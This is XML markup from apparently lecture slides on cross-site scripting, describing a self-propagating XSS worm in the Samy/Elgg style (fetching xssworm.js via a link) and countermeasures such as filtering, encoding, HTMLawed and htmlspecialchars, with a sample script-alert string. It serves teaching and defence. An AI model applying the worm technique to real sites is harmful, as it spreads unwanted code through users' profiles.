                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> In HTTP POST requests, data is sent with Content-Type as “application/x-www-form-urlencoded”. We use encodeURIComponent() function to encode the string.</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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Access level of each field: 2 means public.</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 sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After Samy places this self-propagating code in his profile, when Alice visits Samy’s profile, the worm gets executed and modifies Alice’s profile, inside which, a copy of the worm code is also placed. So, any user visiting Alice’s profile will too get infected in the same way.</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Self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm: The Link Approach</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="686" name="Google Shape;686;p112"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1486337"/>
            <a:ext cx="5656426" cy="497775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5871000" y="1458775"/>
            <a:ext cx="3190800" cy="3540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The JavaScript code xssworm.js will be fetched from the URL.</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Hence, we do not need to include all the worm code in the profile.</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Inside the code, we need to achieve damage and self-propagation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="688" name="Google Shape;688;p112"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2302775"/>
            <a:ext cx="5656424" cy="18520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Countermeasures: the Filter Approach</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="221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rPr>
              <a:t>Removes code from user inputs.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is difficult to implement as there are many ways to embed code other than &lt;script&gt; tag.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use of open-source libraries that can filter out JavaScript code. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example : jsoup</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>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Countermeasures: The Encoding Approach</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Google Shape;700;p1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Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replaces HTML markups with alternate representations.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If data containing JavaScript code is encoded before being sent to the browsers, the embedded JavaScript code will be displayed by browsers, not executed by them.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Converts &lt;script&gt; alert(‘XSS’) &lt;/script&gt; to &amp;lt;script&amp;gt;alert(‘XSS’)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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Countermeasures: Elgg’s Approach</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p1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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP module HTMLawed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="346075" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Highly customizable PHP script to sanitize HTML against XSS attacks.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="346075" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP function htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="346075" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode data provided by users, s.t., JavaScript code in user’s inputs will be interpreted by browsers only as strings and not as code.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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1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Client - Browser </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="734500"/>
            <a:ext cx="8520600" cy="38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frame</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Load content</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Render it</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Process html, scripts, images, subframes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Static &amp; dynamic content</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Response to events such as onclick(), onmouseover() …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Becomes more and more complicated</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript, DOM(Document Object Model), AJAX (Asynchronous Javascript and XML), multimedia, geolocation, NaCL (Native client), websockets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712" name="Google Shape;712;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